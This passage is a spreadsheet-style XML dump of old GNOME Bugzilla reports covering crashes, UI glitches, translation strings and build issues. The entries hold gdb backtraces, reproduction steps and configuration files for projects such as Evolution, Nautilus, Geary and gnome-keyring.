LM-PARSER: ATTRIBUTE: to = sam@robots.org.uk/home
LM-PARSER: ATTRIBUTE: from = XXXXXXXXXXXXXXXX@jabber.org/Home
LM-PARSER: ATTRIBUTE: xmlns = jabber:x:event
LM-PARSER: Trying to close node: id
LM-PARSER: Trying to close node: composing
LM-PARSER: Trying to close node: x
LM-PARSER: Trying to close node: message
LM-PARSER: Have a new message
*** New message with type=message from: XXXXXXXXXXXXXXXX@jabber.org/Home
I guess this is a 'user is typing' notification that Gossip is
mis-recognising as a message from that user.</t>
  </si>
  <si>
    <t>EVOLUTION-247238</t>
  </si>
  <si>
    <t>crash while opening a new mail</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: critical
Version: GNOME2.2.2 1.4.3
os_details: Ximian Inc.
Synopsis: crash while opening a new mail
Bugzilla-Product: Evolution
Bugzilla-Component: Calendar
BugBuddy-GnomeVersion: 2.0 (2.2.0.1)
Description:
Description of Problem:
Steps to reproduce the problem:
1. 
2. 
3. 
Actual Results:
Expected Results:
How often does this happen?
Additional Information:
Debugging Information:
Backtrace was generated from '/usr/bin/evolution-1.4'
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...[New Thread 16384 (LWP 14487)]
[New Thread 32769 (LWP 14494)]
[New Thread 16386 (LWP 14495)]
[New Thread 32771 (LWP 14496)]
[New Thread 49156 (LWP 14497)]
[New Thread 65541 (LWP 14498)]
[New Thread 131078 (LWP 14506)]
[New Thread 4308999 (LWP 18918)]
[New Thread 4325384 (LWP 18919)]
0x008505aa in waitpid ()
   from /lib/i686/libpthread.so.0
#0  0x008505aa in waitpid () from /lib/i686/libpthread.so.0
#1  0x0043908a in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
#2  0x0808b7e6 in evolution_storage_set_view_factory_new_view ()
#3  0x0084f4be in __pthread_sighandler () from
/lib/i686/libpthread.so.0
#4  
#5  0x0513afda in gtk_widget_get_toplevel () from
/usr/lib/libgtk-x11-2.0.so.0
#6  0x0513a2d6 in gtk_widget_get_child_visible ()
   from /usr/lib/libgtk-x11-2.0.so.0
#7  0x0513a42d in gtk_widget_has_screen () from
/usr/lib/libgtk-x11-2.0.so.0
#8  0x05044a5c in gtk_entry_get_type () from
/usr/lib/libgtk-x11-2.0.so.0
#9  0x00918c60 in g_timeout_add () from /usr/lib/libglib-2.0.so.0
#10 0x009164ae in unblock_source () from /usr/lib/libglib-2.0.so.0
#11 0x009173dd in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#12 0x009176e3 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#13 0x00917d42 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#14 0x002ef5cd in bonobo_main () from /usr/lib/libbonobo-2.so.0
#15 0x0808bace in main ()
#16 0x00ae5a07 in __libc_start_main () from /lib/i686/libc.so.6
Thread 9 (Thread 4325384 (LWP 18919)):
#0  0x0084c845 in __pthread_sigsuspend () from
/lib/i686/libpthread.so.0
No symbol table info available.
#1  0x0084c318 in __pthread_wait_for_restart_signal ()
   from /lib/i686/libpthread.so.0
No symbol table info available.
#2  0x00848cbb in pthread_cond_wait@GLIBC_2.0 () from
/lib/i686/libpthread.so.0
No symbol table info available.
#3  0x00a92fc6 in e_msgport_wait () from
/usr/lib/evolution/1.4/libeutil.so.0
No symbol table info available.
#4  0x00a93866 in e_thread_busy () from
/usr/lib/evolution/1.4/libeutil.so.0
No symbol table info available.
#5  0x0084a9b1 in pthread_start_thread () from
/lib/i686/libpthread.so.0
No symbol table info available.
Thread 8 (Thread 4308999 (LWP 18918)):
#0  0x0084c845 in __pthread_sigsuspend () from
/lib/i686/libpthread.so.0
No symbol table info available.
#1  0x0084c318 in __pthread_wait_for_restart_signal ()
   from /lib/i686/libpthread.so.0
No symbol table info available.
#2  0x00848cbb in pthread_cond_wait@GLIBC_2.0 () from
/lib/i686/libpthread.so.0
No symbol table info available.
#3  0x00a92fc6 in e_msgport_wait () from
/usr/lib/evolution/1.4/libeutil.so.0
No symbol table info available.
#4  0x00a93866 in e_thread_busy () from
/usr/lib/evolution/1.4/libeutil.so.0
No symbol table info available.
#5  0x0084a9b1 in pthread_start_thread () from
/lib/i686/libpthread.so.0
No symbol table info available.
Thread 7 (Thread 131078 (LWP 14506)):
#0  0x0084c845 in __pthread_sigsuspend () from
/lib/i686/libpthread.so.0
No symbol table info available.
#1  0x0084c318 in __pthread_wait_for_restart_signal ()
   from /lib/i686/libpthread.so.0
No symbol table info available.
#2  0x00848cbb in pthread_cond_wait@GLIBC_2.0 () from
/lib/i686/libpthread.so.0
No symbol table info available.
#3  0x00a92fc6 in e_msgport_wait () from
/usr/lib/evolution/1.4/libeutil.so.0
No symbol table info available.
#4  0x00a93866 in e_thread_busy () from
/usr/lib/evolution/1.4/libeutil.so.0
No symbol table info available.
#5  0x0084a9b1 in pthread_start_thread () from
/lib/i686/libpthread.so.0
No symbol table info available.
Thread 6 (Thread 65541 (LWP 14498)):
#0  0x0084c845 in __pthread_sigsuspend () from
/lib/i686/libpthread.so.0
No symbol table info available.
#1  0x0084c318 in __pthread_wait_for_restart_signal ()
   from /lib/i686/libpthread.so.0
No symbol table info available.
#2  0x00848cbb in pthread_cond_wait@GLIBC_2.0 () from
/lib/i686/libpthread.so.0
No symbol table info available.
#3  0x00a92fc6 in e_msgport_wait () from
/usr/lib/evolution/1.4/libeutil.so.0
No symbol table info available.
#4  0x00a93866 in e_thread_busy () from
/usr/lib/evolution/1.4/libeutil.so.0
No symbol table info available.
#5  0x0084a9b1 in pthread_start_thread () from
/lib/i686/libpthread.so.0
No symbol table info available.
Thread 5 (Thread 49156 (LWP 14497)):
#0  0x0084c845 in __pthread_sigsuspend () from
/lib/i686/libpthread.so.0
No symbol table info available.
#1  0x0084c318 in __pthread_wait_for_restart_signal ()
   from /lib/i686/libpthread.so.0
No symbol table info available.
#2  0x00848cbb in pthread_cond_wait@GLIBC_2.0 () from
/lib/i686/libpthread.so.0
No symbol table info available.
#3  0x00a92fc6 in e_msgport_wait () from
/usr/lib/evolution/1.4/libeutil.so.0
No symbol table info available.
#4  0x00a93866 in e_thread_busy () from
/usr/lib/evolution/1.4/libeutil.so.0
No symbol table info available.
#5  0x0084a9b1 in pthread_start_thread () from
/lib/i686/libpthread.so.0
No symbol table info available.
Thread 4 (Thread 32771 (LWP 14496)):
#0  0x0084c845 in __pthread_sigsuspend () from
/lib/i686/libpthread.so.0
No symbol table info available.
#1  0x0084c318 in __pthread_wait_for_restart_signal ()
   from /lib/i686/libpthread.so.0
No symbol table info available.
#2  0x00848cbb in pthread_cond_wait@GLIBC_2.0 () from
/lib/i686/libpthread.so.0
No symbol table info available.
#3  0x00a92fc6 in e_msgport_wait () from
/usr/lib/evolution/1.4/libeutil.so.0
No symbol table info available.
#4  0x00a93866 in e_thread_busy () from
/usr/lib/evolution/1.4/libeutil.so.0
No symbol table info available.
#5  0x0084a9b1 in pthread_start_thread () from
/lib/i686/libpthread.so.0
No symbol table info available.
Thread 3 (Thread 16386 (LWP 14495)):
#0  0x0084c845 in __pthread_sigsuspend () from
/lib/i686/libpthread.so.0
No symbol table info available.
#1  0x0084c318 in __pthread_wait_for_restart_signal ()
   from /lib/i686/libpthread.so.0
No symbol table info available.
#2  0x00848cbb in pthread_cond_wait@GLIBC_2.0 () from
/lib/i686/libpthread.so.0
No symbol table info available.
#3  0x00a92fc6 in e_msgport_wait () from
/usr/lib/evolution/1.4/libeutil.so.0
No symbol table info available.
#4  0x00a93866 in e_thread_busy () from
/usr/lib/evolution/1.4/libeutil.so.0
No symbol table info available.
#5  0x0084a9b1 in pthread_start_thread () from
/lib/i686/libpthread.so.0
No symbol table info available.
Thread 2 (Thread 32769 (LWP 14494)):
#0  0x00ba8e57 in poll () from /lib/i686/libc.so.6
No symbol table info available.
#1  0x008499ce in __pthread_manager () from /lib/i686/libpthread.so.0
No symbol table info available.
Thread 1 (Thread 16384 (LWP 14487)):
#0  0x008505aa in waitpid () from /lib/i686/libpthread.so.0
No symbol table info available.
#1  0x0043908a in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
No symbol table info available.
#2  0x0808b7e6 in evolution_storage_set_view_factory_new_view ()
No symbol table info available.
#3  0x0084f4be in __pthread_sighandler () from
/lib/i686/libpthread.so.0
No symbol table info available.
#4  
No symbol table info available.
#5  0x0513afda in gtk_widget_get_toplevel () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#6  0x0513a2d6 in gtk_widget_get_child_visible ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#7  0x0513a42d in gtk_widget_has_screen () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#8  0x05044a5c in gtk_entry_get_type () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#9  0x00918c60 in g_timeout_add () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#10 0x009164ae in unblock_source () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#11 0x009173dd in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#12 0x009176e3 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#13 0x00917d42 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#14 0x002ef5cd in bonobo_main () from /usr/lib/libbonobo-2.so.0
No symbol table info available.
#15 0x0808bace in main ()
No symbol table info available.
#16 0x00ae5a07 in __libc_start_main () from /lib/i686/libc.so.6
No symbol table info available.
#0  0x008505aa in waitpid () from /lib/i686/libpthread.so.0
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>ANJUTA-558933</t>
  </si>
  <si>
    <t>plugins: symbol-db</t>
  </si>
  <si>
    <t>symbol-db does not show all autocompletions</t>
  </si>
  <si>
    <t>Typing ianjuta_iter into the search window gives me quite some ianjuta_iterable_* methods but typing it in the editor does not give a single completion.
If I type gtk_widget_show() I get no autocompletion but the tooltips work.
Could be some bug in language-support-cpp-java too but I think that it's related to symbol-db.</t>
  </si>
  <si>
    <t>EVOLUTION-352187</t>
  </si>
  <si>
    <t>Birthdays of older people *not* displayed...</t>
  </si>
  <si>
    <t>See bug 352184 probably related.
* Enter the Birthday with year 47. Switch to the Calendar
  see the Birthday *not* being displayed.
* Change Birthday to 97. See the Birthday being displayed.
* goto 1...</t>
  </si>
  <si>
    <t>GNOME-APPLETS-29001</t>
  </si>
  <si>
    <t>used and free colours switched on disk useage applet</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  gnome-applets
Severity: normal
Version:  disk applet 1.2.1
Synopsis: used and free colours switched on disk useage applet
Class:    sw-bug
Distribution: Linux Mandrake release 7.1 (helium)
System: Linux 2.2.15-4mdk i586 unknown
C library: glibc-2.1.3-5mdk
C compiler: 2.95.3
glib: 1.2.8
GTK+: 1.2.8
ORBit: ORBit 0.5.3
gnome-libs: gnome-libs 1.2.4
libxml: 1.8.10
gnome-print: gnome-print-0.20
gnome-core: gnome-core 1.2.1
Description:
The used and free colours in the configuration dialog box are switched
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-27 17:01 -------
This bug was previously known as bug 29001 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=29001
Originally filed under the gnome-applets product and general component.
The original reporter (ee71ae@eim.surrey.ac.uk) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component gnome-applets-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>ee71ae</t>
  </si>
  <si>
    <t>NAUTILUS-307949</t>
  </si>
  <si>
    <t>nautilus crash on exit after traversing subdirectory</t>
  </si>
  <si>
    <t>Distribution/Version: Debian sid
Running `nautilus` I discovered nautilus almost always crashes with the
following steps. I repeated the same actions many times varying the
extent to which I reproduced the actions and found that this is the
most sure way to make it crash.
Steps to reproduce the problem:
0. Ensure nautilus is using list-view the status bar and location bar
and is not using the side-pane.
1. Run nautilus.
2. Double-click a subdirectory and scroll down (with mouse wheel if
possible) and up again. Pause between each action for luck.
3. Click the up button on the toolbar.
4. Move the mouse to the lower region of the window and pause for a few
seconds.
5. Click the window manager close button on the title-bar (top-right on
metacity).
Actual Results:
Nautilus stops responding and gnome spawns the gnome_segv program which
prompts you to send a bug report or close the program. (Bug Buddy then
crashes if launched from here.)
Expected Results:
Nautilus exits gracefully.
How often does this happen?
90% reproducible if actions reproduced perfectly.
Additional Information:
An strace output for this procedure can be found at
http://www.virgonet.org/adonikam/log.
When I reproduced the crash and clicked Inform Developers the spawned
Bug Buddy window also crashed so I used a seperate bug buddy window to
debug the running applications (without debugging symbols unfortunately)
and have posted the backtraces at
http://www.virgonet.org/adonikam/nautilus and
http://www.virgonet.org/adonikam/bugbuddy.
Versions:
Debian Unstable package versions shown in brackets.
Gnome nautilus 2.8.2 (2.8.2-2)
Gnome bug-buddy 2.8.0 (2.8.0-3)</t>
  </si>
  <si>
    <t>adonikam</t>
  </si>
  <si>
    <t>EVOLUTION-230060</t>
  </si>
  <si>
    <t>Evolution mishandles recurring events</t>
  </si>
  <si>
    <t>Evolution expects every exception to a recurring meeting to have its
own UID. RFC2445 is vague on this but the consensus on the ietf-calendar
list is that this is wrong: the recurring event as a whole has a UID
but individual instances and exceptions all share that same UID and just
have different RECURRENCE-IDs. That's how Exchange works and this
causes problems between Evolution and Outlook/Exchange.</t>
  </si>
  <si>
    <t>EVOLUTION-352358</t>
  </si>
  <si>
    <t>harmonize some error messages</t>
  </si>
  <si>
    <t>#: ../addressbook/addressbook.error.xml.h:1
msgid 
A contact already exists with this address. Would you like to add a new card 
with the same address anyway?
#: ../addressbook/gui/merging/eab-contact-duplicate-detected.glade.h:4
msgid 
The name or email address of this contact already exists\n
in this folder.  Would you like to add it anyway?
#: ../addressbook/gui/merging/eab-contact-commit-duplicate-detected.glade.h:4
msgid 
The changed email or name of this contact already\n
exists in this folder.  Would you like to add it anyway?
don't know if those three are related. has to be checked.
#: ../addressbook/gui/component/addressbook-view.c:445
msgid A Folder with this name already exists
#: ../filter/filter.error.xml.h:7
msgid Name {0} already used.
#: ../mail/mail.error.xml.h:1
msgid 
A folder named {1} already exists. Please use a different name.
#: ../plugins/exchange-operations/org-gnome-exchange-operations.error.xml.h:35
msgid Folder already exists
also see bug 308276.</t>
  </si>
  <si>
    <t>TOTEM-451854</t>
  </si>
  <si>
    <t>totem-marshal build problem</t>
  </si>
  <si>
    <t>totem-marshal.c generates a compiler warning about missing prototypes.</t>
  </si>
  <si>
    <t>GEARY-714872</t>
  </si>
  <si>
    <t>Starring message in Conversation View causes paperclip (attachment) icon to disappear</t>
  </si>
  <si>
    <t xml:space="preserve">
---- Reported by jim@yorba.org 2012-11-05 13:45:00 -0800 ----
Original Redmine bug id: 6056
Original URL: http://redmine.yorba.org/issues/6056
Searchable id: yorba-bug-6056
Original author: Jim Nelson
Original description:
To repro:
  * Select a conversation with an attachment
  * Star the message with the attachment (i.e. don't star the conversation just the message)
The paperclip icon beside it will disappear. It will only reappear by leaving
and returning to the conversation.
---- Additional Comments From geary-maint@gnome.bugs 2013-05-01 11:49:00 -0700 ----
### History
####
#1
Updated by Tiago Quelhas 11 months ago
  * **File** geary-keep-attachment-icon-on-starring.patch added
Hi
I think I got this one. The problem seems to be that the Email instance passed
to ConversationViewer::update_flags() is fetched from the emails HashMap in
ConversationMonitor (see geary-conversation-monitor.vala:679) which does not
store the email bodies.
The patch below moves the attachment icon-related code of update_flags() to a
new method set_attachment_icon() so that it doesn't run when a message is
starred. The only other call site for update_flags() is add_message() and is
updated accordingly.
####
#2
Updated by Jim Nelson 11 months ago
  * **Status** changed from _Open_ to _Review_
Great! We'll take a look at this shortly.
####
#3
Updated by Tiago Quelhas 10 months ago
  * **Status** changed from _Review_ to _5_
Applied in changeset c476669ff5b54a469e873f729ab26dded7ec0d77.
####
#4
Updated by Jim Nelson 10 months ago
  * **Resolution** set to _fixed_
Great job!
####
#5
Updated by Charles Lindsay 7 months ago
  * **Status** changed from _5_ to _Fixed_
--- Bug imported by chaz@yorba.org 2013-11-21 23:13 UTC  ---
This bug was previously known as _bug_ 6056 at http://redmine.yorba.org/show_bug.cgi?id=6056
Imported an attachment (id=261178)
Unknown milestone unknown in product geary. 
   Setting to default milestone for this product ---.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>EKIGA-328528</t>
  </si>
  <si>
    <t>Local address book search fails after no user has been found / cannot reset search</t>
  </si>
  <si>
    <t>Please describe the problem:
After doing a search for a contact in a local address book that returns 0 
results I can't reset the search to show all users again. Even searching for an 
existing user doesn't show that one any more.
Steps to reproduce:
1. Open Address book
2. Create a contact in the local address book
3. Search for a string that returns no results (e.g. whoaaaaa)
4a. Search for the contact you've just created
4b. Empty the search term box and press the find button
Actual results:
Nothing.
Expected results:
5a. The contact is found
5b. All contacts are shown
Does this happen every time?
Yes
Other information:
Ekiga/1.99.0 on a Gentoo KDE box</t>
  </si>
  <si>
    <t>GNOME-KEYRING-500500</t>
  </si>
  <si>
    <t>cannot start keyring daemon from pam module</t>
  </si>
  <si>
    <t>This is on Mandriva Cooker with gnome-keyring 2.20.2. My /etc/pam.d/gdm looks like this:
#%PAM-1.0
auth       required     pam_env.so
auth       required     pam_nologin.so
auth       include      system-auth
account    include      system-auth
password   include      system-auth
session    optional     pam_console.so
session    include      system-auth
auth optional pam_gnome_keyring.so
session optional pam_gnome_keyring.so auto_start
The error from /var/log/auth.log:
Nov 29 20:38:30 abgrund gdm-binary[8156]: pam_unix(gdm:session): session opened for user goetz by (uid=0)
Nov 29 20:38:30 abgrund gdm-binary[8156]: mkdtemp: socket dir: Permission denied
Nov 29 20:38:30 abgrund gdm-binary[8156]: gkr-pam: gnome-keyring-daemon didn't start properly properly
The permissions of /tmp look fine: # ls -ld /tmp
drwxrwxrwt 118 root root 20480 2007-11-29 20:42 /tmp/
I thought it was a problem that gdm and the user have a different TMPDIR but changing this doesn't help. The gdm environment forces it to /tmp while the user has /home/user/tmp.
The daemon is started later by the first program accessing a stored password.</t>
  </si>
  <si>
    <t>GTK+-51124</t>
  </si>
  <si>
    <t>GtkFrame uses GtkArg instead of GParam.</t>
  </si>
  <si>
    <t>GtkFrame should use GParam.
Patch to follow.</t>
  </si>
  <si>
    <t>FILE-ROLLER-101428</t>
  </si>
  <si>
    <t>Remove unnecessary markup from glade messages in file-roller</t>
  </si>
  <si>
    <t>#: src/file_roller.glade.h:3
msgid Actions
#: src/file_roller.glade.h:4
msgid Destination folder
#: src/file_roller.glade.h:5
msgid Files
This use of markup inside messages marked for translation is totally
unnecessary and a problem for the translation process. For details see
the problem description in bug 96836. Since these are glade messages I'll
mark it dependant on the glade bug 97061 in the mean time.</t>
  </si>
  <si>
    <t>BALSA-636801</t>
  </si>
  <si>
    <t>Fix syntax in manpage</t>
  </si>
  <si>
    <t>Small fix on for manpage syntax.</t>
  </si>
  <si>
    <t>nmo.marques</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-62975</t>
  </si>
  <si>
    <t>Crash</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  control-center
Severity: normal
Version:  1.2.2
Synopsis: Crash
Class:    sw-bug
Distribution: Red Hat Linux release 7.1 (Seawolf)
System: Linux 2.4.9-6 i686 unknown
C library: glibc-2.2.4-19
C compiler: 2.96
glib: 1.2.9
GTK+: 1.2.9
ORBit: ORBit 0.5.7
gnome-libs: gnome-libs 1.2.8
libxml: 1.8.10
gnome-print: gnome-print-0.25-9
gnome-core: gnome-core 1.2.4
Description:
i tried to use it it went down
Debugging information:
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...0x4058b989 in __wait4 ()
   from /lib/i686/libc.so.6
#0  0x4058b989 in __wait4 () from /lib/i686/libc.so.6
#1  0x40607534 in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x4016f7e8 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
#3  
#4  0x402820c6 in gtk_ctree_expand_recursive () from /usr/lib/libgtk-1.2.so.0
#5  0x08051d4e in launch_capplet () at eval.c:41
#6  0x0804ea64 in generate_tree () at eval.c:41
#7  0x402bd2dc in gtk_marshal_NONE__POINTER_INT ()
   from /usr/lib/libgtk-1.2.so.0
#8  0x402f0916 in gtk_handlers_run () from /usr/lib/libgtk-1.2.so.0
#9  0x402efc3d in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#10 0x402ed9f5 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#11 0x40282918 in gtk_ctree_select () from /usr/lib/libgtk-1.2.so.0
#12 0x08051d5d in launch_capplet () at eval.c:41
#13 0x0804ea64 in generate_tree () at eval.c:41
#14 0x402bd2dc in gtk_marshal_NONE__POINTER_INT ()
   from /usr/lib/libgtk-1.2.so.0
#15 0x402f0916 in gtk_handlers_run () from /usr/lib/libgtk-1.2.so.0
#16 0x402efc3d in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#17 0x402ed9f5 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#18 0x4027f910 in real_select_row () from /usr/lib/libgtk-1.2.so.0
#19 0x402bd290 in gtk_marshal_NONE__INT_INT_POINTER ()
   from /usr/lib/libgtk-1.2.so.0
#20 0x402efac1 in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#21 0x402ed9f5 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#22 0x402655fb in toggle_row () from /usr/lib/libgtk-1.2.so.0
#23 0x40269712 in gtk_clist_button_release () from /usr/lib/libgtk-1.2.so.0
#24 0x402bcfbc in gtk_marshal_BOOL__POINTER () from /usr/lib/libgtk-1.2.so.0
#25 0x402efc7d in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#26 0x402ed9f5 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#27 0x403280e9 in gtk_widget_event () from /usr/lib/libgtk-1.2.so.0
#28 0x402bcf15 in gtk_propagate_event () from /usr/lib/libgtk-1.2.so.0
#29 0x402bbf3f in gtk_main_do_event () from /usr/lib/libgtk-1.2.so.0
#30 0x40373e4f in gdk_event_dispatch () from /usr/lib/libgdk-1.2.so.0
#31 0x400907f3 in g_main_dispatch () at eval.c:41
#32 0x40090dd9 in g_main_iterate () at eval.c:41
#33 0x40090f8c in g_main_run () at eval.c:41
#34 0x402bb803 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#35 0x0804dc67 in main () at eval.c:41
#36 0x404ed627 in __libc_start_main (main=0x804dc10  argc=5 
    ubp_av=0xbffffb74 init=0x804c1b0  fini=0x805235c  
    rtld_fini=0x4000dcd4  stack_end=0xbffffb6c)
    at ../sysdeps/generic/libc-start.c:129
#0  0x4058b989 in __wait4 () from /lib/i686/libc.so.6
No locals.
#1  0x40607534 in __DTOR_END__ () from /lib/i686/libc.so.6
No symbol table info available.
#2  0x4016f7e8 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#3  
No locals.
#4  0x402820c6 in gtk_ctree_expand_recursive () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#5  0x08051d4e in launch_capplet () at eval.c:41
	in eval.c
ap = (void **) 0x81493f8
digval = 4294966784
digval = 4294966784
digval = 4294966784
digval = 4294966784
p = 0x81493f8 
result = 135566328
result = 135566328
#6  0x0804ea64 in generate_tree () at eval.c:41
41	in eval.c
ap = (void **) 0x81443e0
digval = 4294966784
digval = 4294966784
digval = 4294966784
digval = 4294966784
p = 0x81493f8 
result = 135545824
result = 135566328
#7  0x402bd2dc in gtk_marshal_NONE__POINTER_INT ()
   from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-10-24 22:12 -------
Unknown version 1.2.x in product control-center. Setting version to the default unspecified.
The original reporter (lach@sparkwash.com) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component control-center-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>lach</t>
  </si>
  <si>
    <t>GNOME-LIVE-503347</t>
  </si>
  <si>
    <t>developer-kit</t>
  </si>
  <si>
    <t>GNOME-LIVE</t>
  </si>
  <si>
    <t>Only build what has changed</t>
  </si>
  <si>
    <t>Fix build scripts to only build modules that have changed</t>
  </si>
  <si>
    <t>gnome-live</t>
  </si>
  <si>
    <t>kvandine</t>
  </si>
  <si>
    <t>DIA-547173</t>
  </si>
  <si>
    <t>Ctrl+Alt+M crashes dia</t>
  </si>
  <si>
    <t>from https://bugs.launchpad.net/ubuntu/+bug/256519
I can reliably crash dia 0.96.1 in ubuntu hardy by selecting two objects and pressing Ctrl+Alt+M</t>
  </si>
  <si>
    <t>GNOME-TERMINAL-133982</t>
  </si>
  <si>
    <t>Two labelled-by relations in New Profile window</t>
  </si>
  <si>
    <t>Run gnome-terminal and Choose File | New Profile ... menu option.
The entry field and option menu objects report two labelled-by relations.
The cause of this is that libgail is now better at finding the labels for
these objects so there is no need to manually set the relation.</t>
  </si>
  <si>
    <t>PANGO-494486</t>
  </si>
  <si>
    <t>OpenType should be applied in script's natural direction</t>
  </si>
  <si>
    <t>From https://bugzilla.mozilla.org/show_bug.cgi?id=402427
when there is an ltr directional override lam alef are shaped
as individual connected characters not as a lam-alef ligature.
Obviously... Because we always pass logical text to OpenType engine and mirror glyphs afterwards if rtl...  I'm not worried about the lam-alef case but what wrong substitutions the opentype engine may decide to make...</t>
  </si>
  <si>
    <t>EPIPHANY-328844</t>
  </si>
  <si>
    <t>mathml incorrectly rendered</t>
  </si>
  <si>
    <t>Please describe the problem:
MathML rendering is pretty bad in epiphany. It is better in firefox.
Steps to reproduce:
1. visit some webpage with mathml:
http://www.mozilla.org/projects/mathml/demo/texvsmml.xhtml
2. compare epiphany and firefox rendering
Actual results:
the rendering differs
Expected results:
the rendering should be the same
Does this happen every time?
yes
Other information:
system: ubuntu dapper PPC up to date.
firefox 1.5 epiphany 1.9 built with it.</t>
  </si>
  <si>
    <t>aurelien.naldi</t>
  </si>
  <si>
    <t>DOXYGEN-313572</t>
  </si>
  <si>
    <t>churns forever on python code</t>
  </si>
  <si>
    <t>Version details: 1.4.4
Distribution/Version: 10.3.9
grab the source code for ZWIKI from http://www.zwiki.org
try to run it... for me it spins forever on the file ZWiki/Extensions/mailin.py
(looking at doxywizard's output).  I can see the CPU usage is still very high
but come on it doesn't take that long something's wrong.
Running the OSX packaged version on OSX 10.3.9 with DOT as well.
I tried the same thing on some other packages (zope source....) with similar
results.
Obviously I have high hopes the Python doc'ing functionality can shine the way
C/C++ does!
Here's the config file I used:
# Doxyfile 1.4.4
#---------------------------------------------------------------------------
# Project related configuration options
#---------------------------------------------------------------------------
PROJECT_NAME           = zwiki docs
PROJECT_NUMBER         = 0.31
OUTPUT_DIRECTORY       = /Users/mlindahl/Marc Lindahl/BEA/living
independantly/software/website/zwiki doc
CREATE_SUBDIRS         = NO
OUTPUT_LANGUAGE        = English
USE_WINDOWS_ENCODING   = NO
BRIEF_MEMBER_DESC      = YES
REPEAT_BRIEF           = YES
ABBREVIATE_BRIEF       = The $name class \
                         The $name widget \
                         The $name file \
                         is \
                         provides \
                         specifies \
                         contains \
                         represents \
                         a \
                         an \
                         the
ALWAYS_DETAILED_SEC    = NO
INLINE_INHERITED_MEMB  = NO
FULL_PATH_NAMES        = YES
STRIP_FROM_PATH        = /Applications/
STRIP_FROM_INC_PATH    = 
SHORT_NAMES            = NO
JAVADOC_AUTOBRIEF      = NO
MULTILINE_CPP_IS_BRIEF = NO
DETAILS_AT_TOP         = NO
INHERIT_DOCS           = YES
DISTRIBUTE_GROUP_DOC   = NO
SEPARATE_MEMBER_PAGES  = NO
TAB_SIZE               = 8
ALIASES                = 
OPTIMIZE_OUTPUT_FOR_C  = NO
OPTIMIZE_OUTPUT_JAVA   = NO
SUBGROUPING            = YES
#---------------------------------------------------------------------------
# Build related configuration options
#---------------------------------------------------------------------------
EXTRACT_ALL            = YES
EXTRACT_PRIVATE        = YES
EXTRACT_STATIC         = YES
EXTRACT_LOCAL_CLASSES  = YES
EXTRACT_LOCAL_METHODS  = YES
HIDE_UNDOC_MEMBERS     = NO
HIDE_UNDOC_CLASSES     = NO
HIDE_FRIEND_COMPOUNDS  = NO
HIDE_IN_BODY_DOCS      = NO
INTERNAL_DOCS          = NO
CASE_SENSE_NAMES       = YES
HIDE_SCOPE_NAMES       = NO
SHOW_INCLUDE_FILES     = YES
INLINE_INFO            = YES
SORT_MEMBER_DOCS       = YES
SORT_BRIEF_DOCS        = NO
SORT_BY_SCOPE_NAME     = NO
GENERATE_TODOLIST      = YES
GENERATE_TESTLIST      = YES
GENERATE_BUGLIST       = YES
GENERATE_DEPRECATEDLIST= YES
ENABLED_SECTIONS       = 
MAX_INITIALIZER_LINES  = 30
SHOW_USED_FILES        = YES
SHOW_DIRECTORIES       = YES
FILE_VERSION_FILTER    = 
#---------------------------------------------------------------------------
# configuration options related to warning and progress messages
#---------------------------------------------------------------------------
QUIET                  = NO
WARNINGS               = YES
WARN_IF_UNDOCUMENTED   = YES
WARN_IF_DOC_ERROR      = YES
WARN_NO_PARAMDOC       = NO
WARN_FORMAT            = $file:$line: $text
WARN_LOGFILE           = 
#---------------------------------------------------------------------------
# configuration options related to the input files
#---------------------------------------------------------------------------
INPUT                  = /Users/mlindahl/Marc Lindahl/BEA/living
independantly/software/website/ZWiki
FILE_PATTERNS          = *.c \
                         *.cc \
